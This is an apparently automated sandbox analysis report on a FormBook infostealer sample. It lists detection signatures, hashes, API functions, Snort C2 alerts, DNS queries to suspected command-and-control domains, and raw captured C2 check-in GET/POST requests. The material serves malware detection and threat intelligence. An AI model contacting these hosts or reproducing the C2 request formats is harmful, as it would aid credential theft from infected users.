Windows Analysis Report
nJ8mJTmMf0.exe

Overview

General Information

Sample name: nJ8mJTmMf0.exe
renamed because original name is a hash value
Original sample name: 8e2c2721d94a488e27b363152a56ea079a7932b41144b71f385d8b37ca70aa2e.exe
Analysis ID: 1466073
MD5: dd560917fd1166f8f9a3ca565e1c3957
SHA1: 07e6f2b8aa9410f9a649353da7ca692b14d4a5c4
SHA256: 8e2c2721d94a488e27b363152a56ea079a7932b41144b71f385d8b37ca70aa2e
Tags: exeFormbook
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection

barindex
Source: http://www.adoby.xyz/ghq5/ Avira URL Cloud: Label: malware
Source: https://www.threendresses.com/ecb1/?wd98XJp=i1LTV2o1IZtmrbvE4asAhp8fTTMl8iuKZlDswLcPFQRrGDQpSYT4T6Qz Avira URL Cloud: Label: malware
Source: http://www.adoby.xyz/ghq5/?wd98XJp=dNjYg/LNb+Btw7/gHk7XSMyPk/zPSOV1YOlLUnvgSo8eic1H8Ppx0PY9ldg0aj+ffPmEFDEyAFk9JBqMQ/w/NLyeMKaPgOi3ekgmu34KkG/nLXsYy1o9wJg=&2hZdq=H6f4R Avira URL Cloud: Label: malware
Source: http://www.abc8web.com/sm5e/?wd98XJp=o8xG6LBLqhGEFqfWTr3vbfLymD68CBTmrGDPPbcweY6zCsuE8W4/fbHpwlO8ph1RffMeX91soDhoi1OdGkM065Zd4OviC0ZoCrIQ2N2wQupqguS4lzCfvC0=&2hZdq=H6f4R Avira URL Cloud: Label: malware
Source: https://www.kosherphonestore.com/y0az/?wd98XJp=1StTTN5BD Avira URL Cloud: Label: malware
Source: http://www.threendresses.com/ecb1/ Avira URL Cloud: Label: malware
Source: http://www.threendresses.com/ecb1/?wd98XJp=i1LTV2o1IZtmrbvE4asAhp8fTTMl8iuKZlDswLcPFQRrGDQpSYT4T6Qz9Nxrj1c/x943R5zeBwNAiK6gnAeQLZ/WlxRJaqzCSDsHaoXTEmVBFAAd8oj/2Yo=&2hZdq=H6f4R Avira URL Cloud: Label: malware
Source: http://www.abc8web.com/sm5e/ Avira URL Cloud: Label: malware
Source: nJ8mJTmMf0.exe ReversingLabs: Detection: 57%
Source: Yara match File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.4125575598.00000000082C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1978005632.0000000003080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1977710626.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.4121057875.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1978344060.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4121859503.00000000045C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: nJ8mJTmMf0.exe Joe Sandbox ML: detected
Source: nJ8mJTmMf0.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: PresentationHost.pdbGCTL source: svchost.exe, 00000001.00000003.1940176962.0000000002C59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1940110790.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000003.1910341128.000000000160B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4121058852.000000000080E000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: wntdll.pdbUGP source: nJ8mJTmMf0.exe, 00000000.00000003.1661528296.0000000003D40000.00000004.00001000.00020000.00000000.sdmp, nJ8mJTmMf0.exe, 00000000.00000003.1660936277.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1978035667.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1867131484.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1868917972.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1978035667.000000000339E000.00000040.00001000.00020000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122016791.0000000004EE0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: nJ8mJTmMf0.exe, 00000000.00000003.1661528296.0000000003D40000.00000004.00001000.00020000.00000000.sdmp, nJ8mJTmMf0.exe, 00000000.00000003.1660936277.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1978035667.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1867131484.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1868917972.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1978035667.000000000339E000.00000040.00001000.00020000.00000000.sdmp, PresentationHost.exe, PresentationHost.exe, 00000006.00000002.4122016791.0000000004EE0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: PresentationHost.pdb source: svchost.exe, 00000001.00000003.1940176962.0000000002C59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1940110790.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000003.1910341128.000000000160B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000005E8C000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.000000000550C000.00000004.10000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4121169221.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.2315187674.000000001692C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000005E8C000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.000000000550C000.00000004.10000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4121169221.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.2315187674.000000001692C000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_00664696 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00664696
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_0066C93C FindFirstFileW,FindClose, 0_2_0066C93C
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_0066C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_0066C9C7
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_0066F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0066F200
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_0066F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0066F35D
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_0066F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_0066F65E
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_00663A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00663A2B
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_00663D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00663D4E
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_0066BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_0066BF27
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_00B1BDA0 FindFirstFileW,FindNextFileW,FindClose, 6_2_00B1BDA0
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe Code function: 4x nop then pop ebx 3_2_082E2B35
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe Code function: 4x nop then xor eax, eax 3_2_082E6467
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 4x nop then xor eax, eax 6_2_00B097D0

Networking

barindex
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49736 -> 84.32.84.112:80
Source: Traffic Snort IDS: 2856318 ETPRO TROJAN FormBook CnC Checkin (POST) M4 192.168.2.4:49738 -> 3.33.130.190:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49738 -> 3.33.130.190:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49739 -> 3.33.130.190:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49741 -> 3.33.130.190:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49742 -> 78.111.111.51:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49743 -> 78.111.111.51:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49745 -> 78.111.111.51:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49746 -> 172.67.200.242:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49747 -> 172.67.200.242:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49749 -> 172.67.200.242:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49750 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49751 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49753 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49754 -> 116.213.43.190:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49755 -> 116.213.43.190:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49757 -> 116.213.43.190:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49758 -> 109.95.158.127:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49759 -> 109.95.158.127:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49761 -> 109.95.158.127:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49762 -> 162.0.213.72:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49763 -> 162.0.213.72:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49765 -> 162.0.213.72:80
Source: DNS query: www.adoby.xyz
Source: Joe Sandbox View IP Address: 162.0.213.72 162.0.213.72
Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View ASN Name: ASFIBERSUNUCUTR ASFIBERSUNUCUTR
Source: Joe Sandbox View ASN Name: ACPCA ACPCA
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: DHOSTING-ASWarsawPolandPL DHOSTING-ASWarsawPolandPL
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_006725E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile, 0_2_006725E2
Source: global traffic HTTP traffic detected: GET /y0az/?wd98XJp=1StTTN5BD+5aXW5ltMxXpzm1HVVSwZLsUdxETJpeMbRSKeJkL8yNVC6cqVCEcPMcPzsub+RoFiososJ7aYXNlWIy6nA9AoQ6GnR0Gmd+weA/r+qlKoAho/M=&2hZdq=H6f4R HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.kosherphonestore.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic HTTP traffic detected: GET /sm5e/?wd98XJp=o8xG6LBLqhGEFqfWTr3vbfLymD68CBTmrGDPPbcweY6zCsuE8W4/fbHpwlO8ph1RffMeX91soDhoi1OdGkM065Zd4OviC0ZoCrIQ2N2wQupqguS4lzCfvC0=&2hZdq=H6f4R HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.abc8web.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic HTTP traffic detected: GET /ecb1/?wd98XJp=i1LTV2o1IZtmrbvE4asAhp8fTTMl8iuKZlDswLcPFQRrGDQpSYT4T6Qz9Nxrj1c/x943R5zeBwNAiK6gnAeQLZ/WlxRJaqzCSDsHaoXTEmVBFAAd8oj/2Yo=&2hZdq=H6f4R HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.threendresses.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic HTTP traffic detected: GET /2nu3/?wd98XJp=kpCfKF0WzJdSazQmt+Slz7YMxCL88Ck3GTDuMNK/H/Z7+vSkhcWJrxIVRHFhCg6b5G6dYsxeFoEulnLMEOj8SMB4wRe40fAIutKuKCnjbT5TVzUJ6OZr4Zg=&2hZdq=H6f4R HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.personalcaresale.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic HTTP traffic detected: GET /efdt/?wd98XJp=MALnGsSsCxZXAJsklBHSyvV4Cwt+rIU5CjwRGjorv42b71G2YZGZ8sEfFWk4L2DJaggYN2F6bElJhaqiOt+r3C6w5v7JMVR/VQKh9hDc+/lVPZE+6qMMIlI=&2hZdq=H6f4R HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.coinwab.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic HTTP traffic detected: GET /pqva/?wd98XJp=ZKm3cPRqjLICFiRrATX7oY0MbRIIvi8qgjtP/vsOoinDFUrpWf4t7wcwUBRK5t7Qc0H9b4lf1rTESW8G/Q5oJQ2SGD/5MgBfv+zXfj20S4XoQgB8oyIQXRQ=&2hZdq=H6f4R HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.mqmsqkw.lolConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic HTTP traffic detected: GET /zgi4/?wd98XJp=Bv8WP0Y6I4L4rkLxeI7P9FySYZNc9GwgDECc8onmv+Up0YCRhWOMiFe4VqushDbL0H+yYl3KgA/w0/Chwa1nzYna+/yL7Br3qSv0RQdnV5Z6V6VBi/tSxM4=&2hZdq=H6f4R HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.synergon.spaceConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic HTTP traffic detected: GET /ghq5/?wd98XJp=dNjYg/LNb+Btw7/gHk7XSMyPk/zPSOV1YOlLUnvgSo8eic1H8Ppx0PY9ldg0aj+ffPmEFDEyAFk9JBqMQ/w/NLyeMKaPgOi3ekgmu34KkG/nLXsYy1o9wJg=&2hZdq=H6f4R HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.adoby.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic HTTP traffic detected: GET /uox9/?wd98XJp=SkqqSrQ8SMo2XL3atDg5EwteixjEHmcOkKNOXL2YXVO5YY42DfvwbKSww9pKtEGGvKt0lrGjy49L8DH+d/eZjL5PtpdyGoJABAcliTTSnjNRJ5qgIg1UjKg=&2hZdq=H6f4R HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.washio.worldConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic HTTP traffic detected: GET /7c6d/?wd98XJp=w8YgqO/Zj/36mufrJumMstPGQWcWOvmXve42clWXA0OufJxdz0t5qmDG9Y+qzl9OADQlddr1Os9brfaQNQSPZtNIRBmq9MUfYdPf/ru8jRm7NVZbS2vao50=&2hZdq=H6f4R HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.6666111p.vipConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic HTTP traffic detected: GET /s5jh/?wd98XJp=1TiKqhVN19vKBh0iYV68FE6kd9yptaYL0yZFpqoiJ2lM+QkJ7dUu1EsavkeNrTvMwGcxWHp0eakXjUqcr3ub0eMvg/6QMTuDK9dTv3I1AhU9igMWM3XHjus=&2hZdq=H6f4R HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.0araba.netConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic DNS traffic detected: DNS query: www.miningarea.fun
Source: global traffic DNS traffic detected: DNS query: www.kosherphonestore.com
Source: global traffic DNS traffic detected: DNS query: www.abc8web.com
Source: global traffic DNS traffic detected: DNS query: www.threendresses.com
Source: global traffic DNS traffic detected: DNS query: www.personalcaresale.shop
Source: global traffic DNS traffic detected: DNS query: www.coinwab.com
Source: global traffic DNS traffic detected: DNS query: www.mqmsqkw.lol
Source: global traffic DNS traffic detected: DNS query: www.synergon.space
Source: global traffic DNS traffic detected: DNS query: www.wepayassessments.com
Source: global traffic DNS traffic detected: DNS query: www.adoby.xyz
Source: global traffic DNS traffic detected: DNS query: www.washio.world
Source: global traffic DNS traffic detected: DNS query: www.com-kh.com
Source: global traffic DNS traffic detected: DNS query: www.6666111p.vip
Source: global traffic DNS traffic detected: DNS query: www.0araba.net
Source: global traffic DNS traffic detected: DNS query: www.rtrpodcast.online
Source: unknown HTTP traffic detected: POST /sm5e/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflate, brHost: www.abc8web.comOrigin: http://www.abc8web.comReferer: http://www.abc8web.com/sm5e/Connection: closeContent-Length: 204Content-Type: application/x-www-form-urlencodedCache-Control: max-age=0User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36Data Raw: 77 64 39 38 58 4a 70 3d 6c 2b 5a 6d 35 36 4a 6c 6b 53 54 42 56 4a 76 30 56 36 4b 6b 41 4f 4b 4f 69 69 61 4e 55 6a 37 76 7a 31 75 33 4f 65 49 61 57 50 71 48 46 2f 69 67 2f 45 30 76 52 4c 4c 4e 77 6b 4b 34 6b 78 78 6e 56 36 35 61 53 38 59 76 6e 67 70 76 33 6e 37 6f 48 53 45 79 38 38 4e 2f 6f 74 54 6a 41 45 4d 37 47 2f 6f 34 33 4d 48 71 56 5a 4a 32 6b 38 61 4a 67 52 2b 4a 37 43 38 52 75 6c 72 43 36 56 4e 73 74 2f 75 33 51 70 54 69 67 42 71 61 51 43 46 39 55 66 67 69 36 55 51 31 2b 2f 34 39 63 59 35 37 43 4c 38 47 33 66 51 62 6f 6a 73 51 6d 65 64 70 7a 47 7a 61 6d 6e 52 37 74 51 34 34 71 53 57 59 49 67 3d 3d Data Ascii: wd98XJp=l+Zm56JlkSTBVJv0V6KkAOKOiiaNUj7vz1u3OeIaWPqHF/ig/E0vRLLNwkK4kxxnV65aS8Yvngpv3n7oHSEy88N/otTjAEM7G/o43MHqVZJ2k8aJgR+J7C8RulrC6VNst/u3QpTigBqaQCF9Ufgi6UQ1+/49cY57CL8G3fQbojsQmedpzGzamnR7tQ44qSWYIg==
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 02 Jul 2024 12:07:29 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wgQ6PgazQjAPUs2hqKekXcmDvbNnJlO6Id6UqY8pMnUc5myRrVKxyyC6sEnavsTGfhPch7olsMUBk%2FINfw1pTT0XMj0eLzMq%2FEQ1mWIh1dMeSJsQtHuYNcapZGo41JkSk9SPkanK1AfcS1ZH"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 89ce840689ae4205-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 190
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 02 Jul 2024 12:07:31 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=debBEllbuh7hmv%2Fkp%2BYCMaDVvz7Mwcgdti%2BENkmS3GcqLtw7019zPl2UQ01E4vOlOObWvNj3kSAR6GEaZofestAG3IESC%2FT6GeY7Qh4Za1tpYi6qNlfsLT2ESZMeXgyVGF%2Bp9pyA39JOMZfP"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 89ce84167bac1821-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 190
